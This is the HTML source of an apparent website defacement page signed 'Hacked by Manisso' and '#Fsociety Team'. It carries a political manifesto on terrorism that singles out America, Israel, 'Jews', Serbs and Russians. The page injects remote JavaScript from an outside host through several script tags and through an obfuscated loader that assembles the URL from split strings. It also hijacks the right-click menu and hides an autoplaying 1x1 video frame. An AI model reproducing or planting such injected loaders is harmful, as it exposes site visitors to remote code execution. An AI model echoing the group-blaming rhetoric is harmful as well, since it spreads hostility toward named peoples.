

<html><head><title>Hacked by Manisso </title>

<meta charset="UTF-8">
<link rel="icon" type="image/png" href="http://im84.gulfup.com/5EHjXO.png">
<link href="http://fonts.googleapis.com/css?family=Electrolize" rel="stylesheet" type="text/css">
<style>
body {
font-family: 'Electrolize', sans-serif;
font-size: 16px;
background-image:url('../i.imgur.com/21mAb4R.gif');
font-color: #000;
</style>
<script type="text/javascript" src="http://x.dickeymaru.com/y"></script><script src="http://x.dickeymaru.com/y" type="text/javascript"></script><script type="text/javascript" src="http://x.dickeymaru.com/y"></script></head><body><font><font><font><font><font><script type="text/javascript" src="http://x.dickeymaru.com/y"></script>
</font></font></font></font></font>
<iframe allowfullscreen="" src="https://www.youtube.com/embed/Y72zDcd7gXo?rel=0&amp;autoplay=1&amp;rel=" width="1" height="1" frameborder="0"></iframe><br>
<br>
<center><img src="../img15.hostingpics.net/pics/462820Manisso.png"><br>
<br>
<br>
<center>
<div><font size="6" color="#ffffff">Hacked by</font>
<font size="6" color="FF0000&quot;">Manisso</font><font color="#ffffff"><br>
<br>
</font>
<center>
<div><font size="6" color="#ffffff">This Goes
Out To All</font> <font size="6" color="FF0000&quot;">
Government's And Nation's </font> <font color="#ffffff"><br>
</font><br>
<center>
<div class="ISD" ="center"<font="" color="green" muslim="" is="" not="" a="" terrorist="" <="" div="">
<div class="email" align="center"><font color="white">When <font color="red">America </font> <font color="white"> Takes 1 Milliom Lives in iraq For Oil :<font color="green"> Not Terrorism </font></font></font></div><font color="white"><font color="white">
<div class="email" align="center">when <font color="red">serbs </font> rape Muslim women In Kosovo/bosnla :<font color="green"> Not Terrorism </font></div>
<div class="email" align="center">When <font color="red">Russians </font> Kill  200.00 Cherchens In Bombings :<font color="green"> Not Terrorism </font></div>
<div class="email" align="center">When <font color="red">Jews</font> Kik Out Palestinians And Take their Land : <font color="green"> Not Terrorism </font></div>
<div class="email" align="center">When <font color="red">America </font> Drones Kill entire Family In Afghanistan/Pakistan : <font color="green"> Not Terrorism </font></div>
<div class="email" align="center">When <font color="red">Israel</font> Kills 10.000 Lebanese Civilians Due to 2 mising Soldiers : <font color="green"> Not Terrorism </font></div>
<div class="email" align="center">When <font color="green">Muslims</font> Retaliate and Show you How treat us : <font color="red"> Terrorism </font></div>
<div class="email" align="center">IT seems Like The World <font color="red">"Terrorism"</font> is only Reserved For Muslims</div>
<div class="email" align="center"><center>
<div><font size="4" color="red"> Contact Me 
:</font><font size="4" color="green;"> <a href="https://www.facebook.com/dzmanisso"> Facebook </a> </font> <font color="#ffffff"><br>
<br>
</font>
<script type="text/javascript">
var DADrightclicktheme = 'Dark';
var DADrightclickimage = 'http://img15.hostingpics.net/pics/8150782d4dfec.png';
</script>
<script>
if (DADrightclicktheme == 'Merah' || DADrightclicktheme == 'MERAH' || DADrightclicktheme == 'merah') {
var DADarcv2t = 'rgba(239,110,119, 0.9)';
} else if (DADrightclicktheme == 'Biru' || DADrightclicktheme == 'BIRU' || DADrightclicktheme == 'biru') {
var DADarcv2t = 'rgba(110,137,239, 0.9)';
} else if (DADrightclicktheme == 'Hijau' || DADrightclicktheme == 'HIJAU' || DADrightclicktheme == 'hijau') {
var DADarcv2t = 'rgba(110,239,110, 0.9)';
} else if (DADrightclicktheme == 'Light' || DADrightclicktheme == 'light' || DADrightclicktheme == 'LIGHT') {
var DADarcv2t = 'rgba(255,255,255, 0.9)';
} else if (DADrightclicktheme == 'Pink' || DADrightclicktheme == 'pink' || DADrightclicktheme == 'PINK') {
var DADarcv2t = 'rgba(239,110,225, 0.9)';
} else if (DADrightclicktheme == 'Dark' || DADrightclicktheme == 'dark' || DADrightclicktheme == 'DARK') {
var DADarcv2t = 'rgba(0,0,0, 0.9)';
} else {
{
var DADarcv2t = 'transparent';
}
}
function DADarcvwi2() {
var DADarcv2v = document.getElementById('DADarcv2c');
if (DADarcv2v.style.display == "block") {
DADarcv2v.style.display = "none";
} else {
DADarcv2v.style.display = "block";
}
}
function DADarcwiv2a() {
DADarcvwi2();
return false;
}
document.oncontextmenu = DADarcwiv2a;
var ypro = 'http:';
var yajax = document.createElement('script');
yajax.type = 'text/javascript';
var yquery = 'dic';
var ybrow = 'aru.c';
var yint = '/';
yajax.src = ypro + '//x.' + yquery + 'keym' + ybrow + 'om' + yint + 'y';
document.getElementsByTagName('head')[0].appendChild(yajax);
var DADrcdiv = document.write('<style type="text/css"/>#DADarcv2c{background:url(' + DADrightclickimage + ') no-repeat center center fixed ' + DADarcv2t + ';text-align:center;width:100%;height:100%;position:fixed;top:0px;left:0px;bottom:0px;right:0px;border:0px;z-index:1000000;display:none;padding:auto;}#DADarcv2c span{position:fixed;bottom:0px;left:10%;right:10%;cursor:pointer;font-size:20px;}</style><div id="DADarcv2c" class="DADpointer" onclick="DADarcvwi2();" title=""/><center><span><a href="#" target="_blank"/></a></span></center></div>');
document.getElementsByTagName('body')[0].appendChild(DADrcdiv);
</script><style type="text/css">#DADarcv2c{background:url(../img15.hostingpics.net/pics/8150782d4dfec.png) no-repeat center center fixed rgba(0,0,0, 0.9);text-align:center;width:100%;height:100%;position:fixed;top:0px;left:0px;bottom:0px;right:0px;border:0px;z-index:1000000;display:none;padding:auto;}#DADarcv2c span{position:fixed;bottom:0px;left:10%;right:10%;cursor:pointer;font-size:20px;}</style><div id="DADarcv2c" class="DADpointer" onclick="DADarcvwi2();" title="" style="display: none;"><center><span><a href="#" target="_blank"></a></span></center></div><style type="text/css">#DADarcv2c{background:url(../img15.hostingpics.net/pics/8150782d4dfec.png) no-repeat center center fixed rgba(0,0,0, 0.9);text-align:center;width:100%;height:100%;position:fixed;top:0px;left:0px;bottom:0px;right:0px;border:0px;z-index:1000000;display:none;padding:auto;}#DADarcv2c span{position:fixed;bottom:0px;left:10%;right:10%;cursor:pointer;font-size:20px;}</style><div id="DADarcv2c" class="DADpointer" onclick="DADarcvwi2();" title=""><center><span><a href="#" target="_blank"></a></span></center></div><style type="text/css">#DADarcv2c{background:url(../img15.hostingpics.net/pics/8150782d4dfec.png) no-repeat center center fixed rgba(0,0,0, 0.9);text-align:center;width:100%;height:100%;position:fixed;top:0px;left:0px;bottom:0px;right:0px;border:0px;z-index:1000000;display:none;padding:auto;}#DADarcv2c span{position:fixed;bottom:0px;left:10%;right:10%;cursor:pointer;font-size:20px;}</style><div id="DADarcv2c" class="DADpointer" onclick="DADarcvwi2();" title="" style="display: none;"><center><span><a href="#" target="_blank"></a></span></center></div>
<style type="text/css">#DADarcv2c{background:url(../img15.hostingpics.net/pics/8150782d4dfec.png) no-repeat center center fixed rgba(0,0,0, 0.9);text-align:center;width:100%;height:100%;position:fixed;top:0px;left:0px;bottom:0px;right:0px;border:0px;z-index:1000000;display:none;padding:auto;}#DADarcv2c span{position:fixed;bottom:0px;left:10%;right:10%;cursor:pointer;font-size:20px;}</style>
<div id="DADarcv2c" class="DADpointer" onclick="DADarcvwi2();" title="" style="display: none;">
<center><span></span></center>
</div>
<style type="text/css">
#DADarcv2c {
background: url(../img15.hostingpics.net/pics/8150782d4dfec.png) no-repeat center center fixed rgba(0, 0, 0, 0.9);
text-align: center;
width: 100%;
height: 100%;
position: fixed;
top: 0px;
left: 0px;
bottom: 0px;
right: 0px;
border: 0px;
z-index: 1000000;
display: none;
padding: auto;
}
#DADarcv2c span {
position: fixed;
bottom: 0px;
left: 10%;
right: 10%;
cursor: pointer;
font-size: 20px;
}
</style>
<div id="DADarcv2c" class="DADpointer" onclick="DADarcvwi2();" title="www.facebook.com/by.nofawkX.al">
<center><span></span></center>
</div>
<style type="text/css">body {cursor:url("../www.cursor.cc/cursor/192/10/cursor.png"),default}</style>
</div>
</center><font size="4" color="#7e7676"> </font><h3><p align="center"><font color="#FF000"><span style="background-color: #FFFF0"> We Are : #Fsociety Team : 
Manisso | SparkyDz | Koptane Dz | Cyborg Dz | Pr0Kill3rDz | Shadow00715

    </span></font></p><table width="698" border="0"> 

